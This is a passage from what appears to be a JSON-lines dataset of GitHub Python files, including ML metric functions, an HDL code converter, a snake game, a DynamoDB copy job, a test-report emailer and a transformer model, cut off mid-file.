per_class_accuracy_from_predictions(prediction, target, unique_labels=None):\n# '''\n# Return the accuracy of each class\n\n# Arg(s):\n# prediction : B-dim torch.tensor or np.array\n# model prediction (post-argmax)\n# target : B-dim torch.tensor or np.array\n# integer binary ground truth labels\n# unique_labels : list[int]\n# can specify expected labels\n# Returns:\n# C x 1 np.array of per class accuracy\n# '''\n# # Convert to numpy arrays\n# if torch.is_tensor(prediction):\n# prediction = prediction.cpu().numpy()\n# if torch.is_tensor(target):\n# target = target.cpu().numpy()\n\n# if unique_labels is None:\n# n_classes = np.unique(target).shape[0] # assumes all classes are in target and go from 0 to n_classes - 1\n# unique_labels = [i for i in range(n_classes)]\n# else:\n# n_classes = len(unique_labels)\n# # Make confusion matrix (rows are true, columns are predicted)\n# assert prediction.shape[0] == target.shape[0]\n# cmat = confusion_matrix(\n# target,\n# prediction,\n# labels=unique_labels)\n\n# # Get counts\n# pred_counts = np.diagonal(cmat)\n# target_counts = np.sum(cmat, axis=1)\n\n# # Nan occurs if no target counts. In these cases, set those classes to 0\n# return np.nan_to_num(pred_counts / target_counts)\n\ndef per_class_accuracy_outputs(output, target):\n '''\n Return the accuracy of each class\n\n Arg(s):\n output : B x C torch.tensor or np.array\n model outputs (pre-softmax)\n target : B-dim torch.tensor or np.array\n integer binary ground truth labels\n\n Returns:\n C x 1 np.array of per class accuracy\n '''\n # Convert to numpy arrays\n if torch.is_tensor(output):\n output = output.cpu().numpy()\n if torch.is_tensor(target):\n target = target.cpu().numpy()\n\n # Make confusion matrix (rows are true, columns are predicted)\n n_classes = output.shape[1]\n pred = np.argmax(output, axis=1)\n assert pred.shape[0] == len(target)\n cmat = confusion_matrix(\n target,\n pred,\n labels=[i for i in range(n_classes)])\n\n # Get counts\n pred_counts = np.diagonal(cmat)\n target_counts = np.sum(cmat, axis=1)\n\n # Nan occurs if no target counts. In these cases, set those classes to 0\n return np.nan_to_num(pred_counts / target_counts)\n\n\ndef precision_recall_f1_from_predictions(prediction, target, unique_labels=None):\n '''\n Given outputs and targets, calculate per-class precision\n\n Arg(s):\n prediction : B-dim torch.tensor or np.array\n model prediction\n target : B-dim torch.tensor or np.array\n ground truth target classes\n unique_labels : list[int]\n can specify expected labels\n\n Returns:\n (precisions, recalls, f1s)\n 3-tuple of lists\n '''\n # Move off of gpu and convert to numpy if necessary\n if torch.is_tensor(prediction):\n prediction = prediction.cpu().numpy()\n if torch.is_tensor(target):\n target = target.cpu().numpy()\n\n if unique_labels is None:\n n_classes = np.unique(target).shape[0] # assumes all classes are in target and go from 0 to n_classes - 1\n unique_labels = [i for i in range(n_classes)]\n\n precisions = []\n recalls = []\n f1s = []\n\n # Calculate precision, recall, f1 for each class\n for label in unique_labels:\n # Need True Positives, False Positives, and False Negatives\n TP = np.sum(np.where(((prediction == label) & (target == label)), 1, 0))\n FP = np.sum(np.where(((prediction == label) & (target != label)), 1, 0))\n FN = np.sum(np.where(((prediction != label) & (target == label)), 1, 0))\n\n # Calculate metrics\n precision = TP / (TP + FP)\n recall = TP / (TP + FN)\n f1 = (2 * precision * recall) / (precision + recall)\n\n # Store in respective lists\n precisions.append(precision)\n recalls.append(recall)\n f1s.append(f1)\n\n return precisions, recalls, f1s\n","repo_name":"allisonchen23/model-editing","sub_path":"src/model/metric.py","file_name":"metric.py","file_ext":"py","file_size_in_byte":12889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42536422559","text":"from enum import Enum\n\nfrom hdlConvertorAst.hdlAst import HdlModuleDec, HdlOp\nfrom hdlConvertorAst.hdlAst._expr import HdlOpType, HdlValueId, HdlValueInt\nfrom hdlConvertorAst.py_ver_compatibility import is_str\nfrom hdlConvertorAst.to.hdlUtils import AutoIndentingStream, iter_with_last\nfrom hdlConvertorAst.to.hdl_ast_visitor import HdlAstVisitor\n\n\n# https://www.geeksforgeeks.org/operator-precedence-and-associativity-in-c/\n# http://www.euroelectronica.ro/7-operators/\n# https://gist.github.com/kputnam/5625856\n# https://github.com/kaitai-io/kaitai_struct/issues/69\nclass ASSOCIATIVITY(Enum):\n L_TO_R = \"L_TO_R\"\n R_TO_L = \"R_TO_L\"\n NONE = \"NONE\"\n\n\nASSIGN_OPERATORS_SYMBOLS_C = {\n HdlOpType.ASSIGN: ' = ',\n HdlOpType.PLUS_ASSIGN: ' += ',\n HdlOpType.MINUS_ASSIGN: ' -= ',\n HdlOpType.MUL_ASSIGN: ' *= ',\n HdlOpType.DIV_ASSIGN: ' /= ',\n HdlOpType.MOD_ASSIGN: ' %= ',\n HdlOpType.AND_ASSIGN: ' &= ',\n HdlOpType.OR_ASSIGN: ' |= ',\n HdlOpType.XOR_ASSIGN: ' ^= ',\n HdlOpType.SHIFT_LEFT_ASSIGN: ' <<= ',\n HdlOpType.SHIFT_RIGHT_ASSIGN: ' >>= ',\n}\n\n\nclass ToHdlCommon(HdlAstVisitor):\n\n INDENT_STEP = \" \"\n ALL_UNARY_OPS = {\n getattr(HdlOpType, name) for name in dir(HdlOpType)\n if name.endswith(\"_UNARY\")\n }\n GENERIC_UNARY_OPS = {\n HdlOpType.PLUS_UNARY: \"+\",\n HdlOpType.MINUS_UNARY: \"-\",\n }\n GENERIC_UNARY_OPS_POSTFIX = {}\n GENERIC_BIN_OPS = {\n HdlOpType.ADD: \" + \",\n HdlOpType.SUB: \" - \",\n HdlOpType.MUL: \" * \",\n\n HdlOpType.LT: \" < \",\n HdlOpType.LE: \" <= \",\n HdlOpType.GT: \" > \",\n HdlOpType.GE: \" >= \",\n\n HdlOpType.DOT: \".\",\n }\n\n def __init__(self, out_stream):\n super(ToHdlCommon, self).__init__()\n self.out = AutoIndentingStream(out_stream, self.INDENT_STEP)\n\n def visit_doc(self, obj, line_comment_prefix):\n \"\"\"\n Format doc as line comments\n\n :type line_comment_prefix: str\n \"\"\"\n doc = obj.doc\n if doc is not None:\n doc = doc.split(\"\\n\")\n w = self.out.write\n for last, d in iter_with_last(doc):\n if last and d == \"\":\n break\n w(line_comment_prefix)\n w(d.replace('\\r', ''))\n w(\"\\n\")\n\n def _precedence_of_expr(self, o):\n \"\"\"\n :type o: iHdlExpr\n \"\"\"\n # not id or value\n if not isinstance(o, HdlOp):\n return (-1, ASSOCIATIVITY.NONE, None)\n return self.OP_PRECEDENCE[o.fn] + (o.fn,)\n\n def visit_HdlOp(self, op):\n \"\"\"\n :type op: HdlOp\n \"\"\"\n o = op.fn\n w = self.out.write\n argc = len(op.ops)\n if argc == 1:\n op_str = self.GENERIC_UNARY_OPS.get(o, None)\n if op_str is not None:\n w(op_str)\n self._visit_operand(op.ops[0], 0, op, False, False)\n return\n op_str = self.GENERIC_UNARY_OPS_POSTFIX.get(o, None)\n if op_str is not None:\n self._visit_operand(op.ops[0], 0, op, False, False)\n w(op_str)\n return\n\n if argc == 2:\n op_str = self.GENERIC_BIN_OPS.get(o, None)\n if op_str is not None:\n return self._visit_bin_op(op, op_str)\n if o == HdlOpType.INDEX:\n return self._visit_operator_index(op)\n elif o == HdlOpType.CALL or o == HdlOpType.PARAMETRIZATION:\n return self.visit_operator_call(op)\n else:\n raise NotImplementedError(\n \"Do not know how to convert %s argc:%d\" % (o, argc))\n\n def visit_iHdlExpr(self, o):\n \"\"\"\n :type o: iHdlExpr\n \"\"\"\n w = self.out.write\n if isinstance(o, HdlValueId):\n w(o.val)\n return\n elif is_str(o):\n w('\"%s\"' % o.replace(\"\\n\", \"\\\\\\n\"))\n return\n elif isinstance(o, HdlValueInt):\n self.visit_HdlValueInt(o)\n return\n elif isinstance(o, HdlOp):\n self.visit_HdlOp(o)\n return\n elif isinstance(o, float):\n w(\"%e\" % o)\n else:\n raise NotImplementedError(\n \"Do not know how to convert %r\" % (o))\n\n def _visit_operand_parentheses_extra_check(\n self,\n op_my, precedence_my, asoc_my,\n op_parent, precedence_parent, asoc_parent,\n left, right):\n if op_my in self.ALL_UNARY_OPS and op_parent in self.ALL_UNARY_OPS:\n return True\n return False\n\n def _visit_operand(self, operand, i,\n parent,\n expr_requires_parenthesis,\n cancel_parenthesis):\n \"\"\"\n :type operand: iHdlExpr\n :type i: int\n :type parent: HdlOp\n :type expr_requires_parenthesis: bool\n :type cancel_parenthesis: bool\n \"\"\"\n use_parenthesis = False\n if not cancel_parenthesis:\n # resolve if the parenthesis are required\n precedence_my, asoc_my, op_my = self._precedence_of_expr(operand)\n if precedence_my >= 0: # if this is an expression\n if expr_requires_parenthesis or asoc_my is ASSOCIATIVITY.NONE:\n use_parenthesis = True\n else:\n precedence_parent, asoc_parent = self.OP_PRECEDENCE[parent.fn]\n right = None\n left = None\n argc = len(parent.ops)\n assert argc, parent\n if argc == 1:\n if asoc_parent == ASSOCIATIVITY.L_TO_R:\n # post fix\n left = parent.ops[0]\n else:\n assert asoc_parent == ASSOCIATIVITY.R_TO_L, asoc_parent\n right = parent.ops[0]\n else:\n if i == 0:\n right = parent.ops[1]\n else:\n left = parent.ops[i - 1]\n if argc > i + 2:\n right = parent.ops[i + 1]\n\n if self._visit_operand_parentheses_extra_check(\n op_my, precedence_my, asoc_my, parent.fn,\n precedence_parent, asoc_parent, left, right):\n use_parenthesis = True\n else:\n if left is not None: # \"operand\" is on right side of parent operator\n # same precedence -> parenthesis on right (this) if it is expression\n # a + (b + c)\n # a + b + c = (a + b) + c\n # right with lower precedence -> parenthesis for right not required\n # a + b * c = a + (b * c)\n # right with higher precedence -> parenthesis for right\n # a * (b + c)\n if precedence_my > precedence_parent:\n use_parenthesis = True\n elif precedence_my == precedence_parent:\n use_parenthesis = argc != 1 or asoc_parent != ASSOCIATIVITY.L_TO_R\n\n if not use_parenthesis and right is not None:\n # \"operand\" is on left side of parent operator\n # if op_my == parent.fn:\n # right_prec, _, right_op = self._precedence_of_expr(right)\n # if right_op == op_my:\n # # right and left with same precedence -> parenthesis on both sides\n # # (a + b) + (c + d)\n # use_parenthesis = True\n if precedence_my > precedence_parent:\n # left with higher precedence -> parenthesis for left\n # (a + b) * c\n # a + b + c + d = (a + b) + c + d\n # = ((a + b) + c) + d\n use_parenthesis = True\n\n w = self.out.write\n if use_parenthesis:\n w(\"(\")\n self.visit_iHdlExpr(operand)\n if use_parenthesis:\n w(\")\")\n\n def _visit_bin_op(self, operator, op_str,\n expr_requires_parenthesis=False,\n cancel_parenthesis=False):\n \"\"\"\n :type operator: HdlOp\n :type op_str: str\n \"\"\"\n op0, op1 = operator.ops\n self._visit_operand(op0, 0, operator, expr_requires_parenthesis,\n cancel_parenthesis)\n self.out.write(op_str)\n self._visit_operand(op1, 1, operator, expr_requires_parenthesis,\n cancel_parenthesis)\n\n def _visit_operator_index(self, operator):\n \"\"\"\n :type operator: HdlOp\n \"\"\"\n op0, op1 = operator.ops\n self._visit_operand(op0, 0, operator, False, False)\n w = self.out.write\n w(\"[\")\n self._visit_operand(op1, 1, operator, False, True)\n w(\"]\")\n\n def visit_operator_call(self, o):\n \"\"\"\n :type operator: HdlOp\n \"\"\"\n self._visit_operand(o.ops[0], 0, o, False, False)\n w = self.out.write\n w(\"(\")\n for is_last, (o_i, _o) in iter_with_last(enumerate(o.ops[1:])):\n self._visit_operand(_o, o_i, o, False, True)\n if not is_last:\n w(\", \")\n w(\")\")\n\n def visit_HdlFunctionDef(self, o):\n \"\"\"\n :type o: HdlFunctionDef\n \"\"\"\n raise TypeError(\"does not support HdlFunctionDef\", self, o)\n\n def visit_HdlStmProcess(self, o):\n \"\"\"\n :type proc: HdlStmProcess\n \"\"\"\n raise TypeError(\"does not support HdlStmProcess\", self, o)\n\n def visit_HdlStmBlock(self, o):\n \"\"\"\n :type o: HdlStmBlock\n \"\"\"\n raise TypeError(\"does not support HdlStmBlock\", self, o)\n\n def visit_HdlStmIf(self, o):\n \"\"\"\n :type o: HdlStmIf\n \"\"\"\n raise TypeError(\"does not support HdlStmIf\", self, o)\n\n def visit_HdlStmCase(self, o):\n \"\"\"\n :type o: HdlStmCase\n \"\"\"\n raise TypeError(\"does not support HdlStmCase\", self, o)\n\n def visit_HdlStmWait(self, o):\n \"\"\"\n :type o: HdlStmWait\n \"\"\"\n raise TypeError(\"does not support HdlStmWait\", self, o)\n\n def visit_HdlStmFor(self, o):\n \"\"\"\n :type o: HdlStmFor\n \"\"\"\n raise TypeError(\"does not support HdlStmFor\", self, o)\n\n def visit_HdlStmForIn(self, o):\n \"\"\"\n :type o: HdlStmForIn\n \"\"\"\n raise TypeError(\"does not support HdlStmForIn\", self, o)\n\n def visit_HdlStmWhile(self, o):\n \"\"\"\n :type o: HdlStmWhile\n \"\"\"\n raise TypeError(\"does not support HdlStmWhile\", self, o)\n\n def visit_HdlStmAssign(self, o):\n \"\"\"\n :type o: HdlStmAssign\n \"\"\"\n raise TypeError(\"does not support HdlStmAssign\", self, o)\n\n def visit_HdlStmRepeat(self, o):\n \"\"\"\n :type o: HdlStmRepeat\n \"\"\"\n raise TypeError(\"does not support HdlStmRepeat\", self, o)\n\n def visit_HdlStmReturn(self, o):\n \"\"\"\n :type o: HdlStmReturn\n \"\"\"\n raise TypeError(\"does not support HdlStmReturn\", self, o)\n\n def visit_HdlStmContinue(self, o):\n \"\"\"\n :type o: HdlStmContinue\n \"\"\"\n raise TypeError(\"does not support HdlStmContinue\", self, o)\n\n def visit_HdlStmBreak(self, o):\n \"\"\"\n :type o: HdlStmBreak\n \"\"\"\n raise TypeError(\"does not support HdlStmBreak\", self, o)\n\n","repo_name":"Nic30/hdlConvertorAst","sub_path":"hdlConvertorAst/to/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":11881,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"53"} +{"seq_id":"42756472589","text":"from dataclasses import dataclass\ng:str = \"hello\"\na = type(\n \"hello\",\n (),\n dict(g = g)\n)\ndef b(a=0):\n print(a)\n\n\nclass testc:\n aa:str = 2\n bb = 1\n\n def __getitem__(self, item):\n print(self.__getattribute__(item))\n\n# def test_m(i:str):\n# a = {\n# \"h\":233\n# }\n# return a[i]\n\na = testc()\na[\"aa\"]\n# args = {\n# \"aa\":1\n# }\n# gg = testc(aa = \"2\")\n#\n#\n# b(1)\n# print(a)\n\n","repo_name":"WendaoLee/toys","sub_path":"JerseyWebGIS/orm/exp.py","file_name":"exp.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13805657046","text":"import smtplib\nfrom email.mime.text import MIMEText\nfrom email.mime.multipart import MIMEMultipart\nfrom email.header import Header\nimport os,time\nfrom base.read_config import get_config\nfrom email.mime.application import MIMEApplication\ndef send_email(reporthtml,resultxlsx):\n #创建一个邮件\n msg=MIMEMultipart()\n #邮件标题\n msg['Subject'] = Header('接口自动化测试报告', 'utf-8')\n msg['from']=get_config('EMAIL', 'sender') # 发送邮件的人\n msg['to']=get_config('EMAIL', 'receiver')\n #邮件正文内容\n content=MIMEText(open(reporthtml,'rb').read(),'html','utf-8')\n #将邮件内容添加到邮件\n msg.attach(content)\n #添加xlsx附件\n attacxlsx = MIMEApplication(open(resultxlsx,'rb').read())\n attacxlsx.add_header('Content-Disposition', 'attachment', filename=resultxlsx)\n msg.attach(attacxlsx)\n #添加html附件\n attachhtml=MIMEApplication(open(reporthtml,'rb').read())\n attachhtml.add_header('Content-Disposition', 'attachment', filename=reporthtml)\n msg.attach(attachhtml)\n '''\n attachhtml = MIMEText(open(reporthtml,'rb').read(), 'base64', 'utf-8')\n attachhtml['Content-Type'] = 'application/octet-stream'\n attachhtml[\"Content-Disposition\"] = 'attachment;filename=\"APIReport.html\"'\n msg.attach(attachhtml)'''\n try:\n s = smtplib.SMTP_SSL(get_config('EMAIL', 'serverip'), get_config('EMAIL', 'serverport'))#ssl加密方式登录邮箱\n s.login(get_config('EMAIL','username'), get_config('EMAIL','password'))\n # 这里的to_address是真正需要发送的到的mail邮箱地址需要的是一个list\n s.sendmail(msg['from'],msg['to'], msg.as_string())\n print('%s----发送邮件成功' % time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime()))\n except Exception as err:\n print(time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime()))\n print(err)\n#2.定义:取最新测试报告\ndef get_NewFile(file_dir):\n #列举test_dir目录下的所有文件,结果以列表形式返回。\n listreport=os.listdir(file_dir)\n #sort按key的关键字进行排序,lambda的入参fn为lists列表的元素,获取文件的最后修改时间\n #最后对lists元素,按文件修改时间大小从小到大排序。\n listreport.sort(key=lambda fn:os.path.getmtime(file_dir+'\\\\'+fn))\n #获取最新文件的绝对路径\n file_path=os.path.join(file_dir,listreport[-1])\n# L=file_path.split('\\\\')\n# file_path='\\\\\\\\'.join(L)\n return file_path\n \n","repo_name":"wfl19890917/API_AutoTest","sub_path":"public/sendEmail.py","file_name":"sendEmail.py","file_ext":"py","file_size_in_byte":2513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36993330549","text":"from typing import List\n\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\nclass Solution:\n def preorderTraversal(self, root: TreeNode) -> List[int]:\n if not root:\n return []\n stack = []\n stack.append(root)\n result = []\n\n while stack:\n node = stack[0]\n stack = stack[1:]\n result.append(node.val)\n if node.right:\n stack.insert(0, node.right)\n\n if node.left:\n stack.insert(0, node.left)\n\n return result\n\nif __name__ == \"__main__\":\n root = TreeNode(1)\n root.right = TreeNode(2)\n root.right.left = TreeNode(3)\n sol = Solution()\n print(sol.preorderTraversal(root))","repo_name":"sumanshil/TopCoder","sub_path":"TopCoder/python/PreOrderTraversal.py","file_name":"PreOrderTraversal.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9320942842","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Dec 01 16:28:31 2016\n\n@author: genkinjz\n\"\"\"\nfrom featurizer import Featurizer\nimport pandas as pd\nfrom dataIDs import DataConstants as dc\n\n\nclass ContextFeaturizer(Featurizer):\n\n def __init__(self,context_data_ids):\n Featurizer.__init__(self)\n self.data_ids = context_data_ids\n return \n \n def can_featurize(self, data,**kwargs):\n return True,\"\"\n \n \n def _Featurizer__do_featurize(self, context_df):\n output_df = pd.DataFrame()\n \n output_df = context_df.copy()\n \n for col in output_df.columns:\n if not self.__include(col): output_df.drop(col)\n for data_id in self.data_ids:\n if data_id.data_category == dc.NOMINAL:\n output_df = pd.get_dummies(output_df,columns=[data_id.uniq_id])\n elif data_id.data_category == dc.ORDINAL:\n output_df[data_id.uniq_id] = context_df[data_id.uniq_id].astype(\"category\").cat.codes\n return output_df\n \n \n def __include(self,uniq_id):\n return uniq_id in [data_id.uniq_id for data_id in self.data_ids]\n","repo_name":"jgenk/icu_data_viz","sub_path":"processor_v6/context_featurizer.py","file_name":"context_featurizer.py","file_ext":"py","file_size_in_byte":1158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27507865961","text":"import pygame, random, sys\nfrom pygame.locals import *\n\ndef collide(x1, x2, y1, y2, w1, w2, h1, h2):\n if x1+w1>x2 and x1y2 and y1= 2:\n if collide(a[0], a[i], b[0], b[i], 20, 20, 20, 20):\n lose(s, points)\n i-= 1\n if collide(a[0], applepos[0], b[0], applepos[1], 20, 10, 20, 10):\n points+=1\n a.append(700)\n b.append(700)\n applepos=(random.randint(0,590),random.randint(0,590))\n \n if a[0] < 0 or a[0] > 580 or b[0] < 0 or b[0] > 580:\n lose(s, points)\n i = len(a)-1\n \n while i >= 1:\n a[i] = a[i-1]\n b[i] = b[i-1]\n i -= 1\n if z==0:\n b[0] += 20\n elif z==1:\n a[0] += 20\n elif z==2:\n b[0] -= 20\n elif z==3:\n a[0] -= 20\t\n s.fill((255, 255, 255))\t\n \n for i in range(0, len(a)):\n s.blit(img, (a[i], b[i]))\n s.blit(appleimage, applepos)\n t=f.render(str(points), True, (0, 0, 0))\n s.blit(t, (10, 10))\n pygame.display.update()","repo_name":"PremNair123/ur4gungame","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11328245052","text":"import math\n\ndef ClosestValue(num, divisor):\n quotient = num / divisor\n str1 = str(quotient)\n n = len(str1)\n\n i = 0\n while i < n-1:\n if str1[i] == '.':\n value = int(str1[i+1])\n break\n i = i+1\n \n if quotient > 0:\n if value < 5:\n x = math.trunc(quotient)\n ans = divisor * x\n return ans\n else:\n x = math.trunc(math.ceil(quotient))\n ans = divisor * x\n return ans\n else:\n if value < 5:\n x = math.trunc(quotient)\n ans = divisor * x\n return ans\n else:\n x = math.trunc(math.floor(quotient))\n ans = divisor * x\n return ans\n\n\n\nif __name__ == \"__main__\":\n # num = -15 # num = 13\n # divisor = 6 # divisor = 4\n\n t = int(input(\"\\nEnter the Number of TestCases: \"))\n\n while t:\n num, divisor = map(int, input(\"\\nEnter the Number to find the Closest value: \").split())\n ans = ClosestValue(num, divisor)\n print(\"Closest value to {} is {}\" .format(num, ans))\n\n print()\n t = t-1\n\n print(\"\\n\")\n\n","repo_name":"maxkashyap41/pythonDSA","sub_path":"String/Closest_Value.py","file_name":"Closest_Value.py","file_ext":"py","file_size_in_byte":1158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30098518922","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport re\nimport visdom\n\n\n\n# progress_folder = '/home/weikaichen/hegsns/Python Proj/high-level-skill/network_reserve/half_cheetah_hurdle_v0_model_1210/HalfCheetah_hurdle-v0/HalfCheetah_hurdle-v0_s0'\n# progress_folder = './network_reserve/sac_gpu/HalfCheetah_hurdle-v0/s0'\n# progress_folder = './network_reserve/model_2323_diversity_trans_matrix_gpu/HalfCheetah_hurdle-v0/s0/'\n# progress_folder = './network_reserve/model_1210/HalfCheetah_hurdle-v0/s0'\n# progress_folder = './network_reserve/model_2323_diversity_trans_matrix_gpu/HalfCheetah_hurdle-v2/s0'\n# progress_folder = './network_reserve/sac_gpu/HalfCheetah_hurdle-v2/s0'\nprogress_folder = './network_reserve/model_1211/HalfCheetah_hurdle-v2/s0'\n# progress_folder = './network_reserve/model_2323_diversity_combine/HalfCheetah_hurdle-v0/s0'\n# progress_folder = './network_reserve/model_1128_diversity_combine/HalfCheetah_hurdle-v0/s0'\n\nfname = '/progress-1-2.8.txt'\n\nprogress = open(progress_folder + fname)\nraw_data = progress.read()\n\npattern = re.compile(r'\\d+\\t[-+]?\\d+.\\d+\\t\\d+\\n')\nraw_data2 = pattern.findall(raw_data)\nprint(raw_data2)\neplisode_buf = []\nreward_buf = []\nsuccess_buf = [0]\nfor idx, value in enumerate(raw_data2):\n # if idx >= 4:\n eplisode_str, reward_str, success_str = value.split('\\t')\n eplisode_buf.append(int(eplisode_str))\n reward_buf.append(float(reward_str[0:-2]))\n success_buf.append(success_buf[-1] + int(success_str))\n\nvis = visdom.Visdom()\nwin = vis.line(\n X=np.array(eplisode_buf),\n Y=np.array(success_buf[1:]),\n opts=dict(\n # xtickmin=-2,\n # xtickmax=2,\n # xtickstep=1,\n # ytickmin=-1,\n # ytickmax=5,\n # ytickstep=1,\n title=(fname),\n markersymbol='dot',\n markersize=5,\n ),\n # update=\"new\",\n name=\"1\",\n )","repo_name":"qxtian/Learning-Independent-SKills","sub_path":"IndependentSkillTransfer/reward_plot.py","file_name":"reward_plot.py","file_ext":"py","file_size_in_byte":1909,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"53"} +{"seq_id":"71876983208","text":"import sys\nfrom typing import List\n\nclass Solution:\n def reverseString(self, s: List[str]) -> None:\n \"\"\"\n Do not return anything, modify s in-place instead.\n \"\"\"\n index1 = 0\n index2 = len(s)-1\n while index1 < index2:\n s[index1], s[index2] = s[index2], s[index1]\n index1 += 1\n index2 -= 1\n\n\n print(s)\n\nsolution = Solution()\nprint(solution.reverseString(list(sys.argv[1])))","repo_name":"nikpopesku/leetcode","sub_path":"python/300-399/344_reverse_string.py","file_name":"344_reverse_string.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28851749648","text":"# Reference: https://docs.aws.amazon.com/glue/latest/dg/aws-glue-programming-etl-dynamo-db-cross-account.html\n\nimport sys\nfrom awsglue.utils import getResolvedOptions\nfrom pyspark.context import SparkContext\nfrom awsglue.context import GlueContext\nfrom awsglue.job import Job\n\nargs = getResolvedOptions(sys.argv, [\"JOB_NAME\"])\nglue_context= GlueContext(SparkContext.getOrCreate())\njob = Job(glue_context)\njob.init(args[\"JOB_NAME\"], args)\n\ndyf = glue_context.create_dynamic_frame_from_options(\n connection_type=\"dynamodb\",\n connection_options={\n \"dynamodb.region\": \"us-west-2\",\n \"dynamodb.input.tableName\": \"\",\n \"dynamodb.sts.roleArn\": \"\"\n }\n)\ndyf.show()\n \nglue_context.write_dynamic_frame_from_options(\n frame=dyf,\n connection_type=\"dynamodb\",\n connection_options={\n \"dynamodb.region\": \"us-west-2\",\n \"dynamodb.output.tableName\": \"\"\n }\n)\n\njob.commit()\n","repo_name":"paulang1807/code-snippets","sub_path":"aws/glue_job_cross_account_dynamo_copy.py","file_name":"glue_job_cross_account_dynamo_copy.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71645682728","text":"from transformers import AutoConfig,AutoModel\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport sys\nimport torch\n\nclass CrossAttnHead(nn.Module):\n def __init__(self,d_model,nhead=16,dropout=0.2):\n super(CrossAttnHead, self).__init__()\n self.AttnHead=nn.MultiheadAttention(d_model,nhead,batch_first=True)\n self.dropout1=nn.Dropout(dropout)\n self.norm1= nn.LayerNorm(d_model)\n self.linear1=nn.Linear(d_model, d_model)\n self.linear2=nn.Linear(d_model, d_model)\n self.dropout2=nn.Dropout(dropout)\n self.norm2= nn.LayerNorm(d_model)\n\n def forward(self, x, attention_mask):\n res=x[:,0].unsqueeze(1)\n x, _ = self.AttnHead(x[:,0].unsqueeze(1),x[:,1:],x[:,1:],attention_mask)\n x=self.dropout1(x)\n x=self.norm1(x)\n x=res+x\n\n x=x.squeeze(1)\n res=x\n x=F.relu(self.linear1(x))\n x=self.linear2(x)\n x=self.dropout2(x)\n x=res+x\n return self.norm2(x)\n\nclass ResidualLSTM(nn.Module):\n\n def __init__(self, d_model, rnn='GRU'):\n super(ResidualLSTM, self).__init__()\n self.downsample=nn.Linear(d_model,d_model//2)\n if rnn=='GRU':\n self.LSTM=nn.GRU(d_model//2, d_model//2, num_layers=2, bidirectional=False, dropout=0.2)\n else:\n self.LSTM=nn.LSTM(d_model//2, d_model//2, num_layers=2, bidirectional=False, dropout=0.2)\n self.dropout1=nn.Dropout(0.2)\n self.norm1= nn.LayerNorm(d_model//2)\n self.linear1=nn.Linear(d_model//2, d_model)\n self.linear2=nn.Linear(d_model*4, d_model)\n self.dropout2=nn.Dropout(0.2)\n self.norm2= nn.LayerNorm(d_model)\n\n def forward(self, x):\n x=x.permute(1,0,2)\n res=x\n x=self.downsample(x)\n x, _ = self.LSTM(x)\n x = self.linear1(x)\n # x=self.dropout1(x)\n # x=self.norm1(x)\n # x=F.relu(self.linear1(x))\n # x=self.linear2(x)\n # x=self.dropout2(x)\n x=res+x\n x=x.permute(1,0,2)\n return self.norm2(x)\n\n\n\nclass SlidingWindowTransformerModel(nn.Module):\n def __init__(self,DOWNLOADED_MODEL_PATH, nclass, rnn='GRU', window_size=512, edge_len=64, no_backbone=False):\n super(SlidingWindowTransformerModel, self).__init__()\n config_model = AutoConfig.from_pretrained(DOWNLOADED_MODEL_PATH+'/config.json')\n self.no_backbone=no_backbone\n if no_backbone:\n pass\n else:\n self.backbone=AutoModel.from_pretrained(\n DOWNLOADED_MODEL_PATH+'/pytorch_model.bin',config=config_model)\n\n hidden_state_dimension=self.backbone.embeddings.word_embeddings.embedding_dim\n\n if rnn==\"GRU\" or rnn=='LSTM':\n self.lstm=ResidualLSTM(hidden_state_dimension,rnn)\n else:\n self.lstm=ResNet()\n\n\n\n self.classification_head=nn.Linear(hidden_state_dimension,nclass)\n self.window_size=window_size\n self.edge_len=edge_len\n self.inner_len=window_size-edge_len*2\n\n self.discourse_embedding=nn.Embedding(8,256,padding_idx=0)\n self.downsample=nn.Linear(hidden_state_dimension+256,hidden_state_dimension)\n\n def forward(self,input_ids,attention_mask,sequence_ids,discourse_type_ids,gather_indices,return_vectors=False,return_transformer_hidden_states=False):\n\n\n\n # print(L)\n # exit()\n #x=self.backbone(input_ids=input_ids,attention_mask=attention_mask,return_dict=False)[0]\n #x=self.backbone.embeddings(input_ids)#+0.1*self.discourse_embedding(discourse_type_ids)\n discourse_type_ids=self.discourse_embedding(discourse_type_ids)\n x=input_ids\n # x=torch.cat([x,discourse_type_ids],-1)\n # x=self.downsample(x)\n\n #x=torch.cat([x,])\n\n if self.no_backbone==False:\n B,L=input_ids.shape\n if L<=self.window_size:\n x=self.backbone(x,attention_mask=attention_mask,return_dict=False)[0]\n #pass\n else:\n #print(\"####\")\n #print(input_ids.shape)\n segments=(L-self.window_size)//self.inner_len\n if (L-self.window_size)%self.inner_len>self.edge_len:\n segments+=1\n elif segments==0:\n segments+=1\n x_new=self.backbone(x[:,:self.window_size],attention_mask=attention_mask[:,:self.window_size],return_dict=False)[0]\n # print(x_new.shape)\n # exit()\n\n 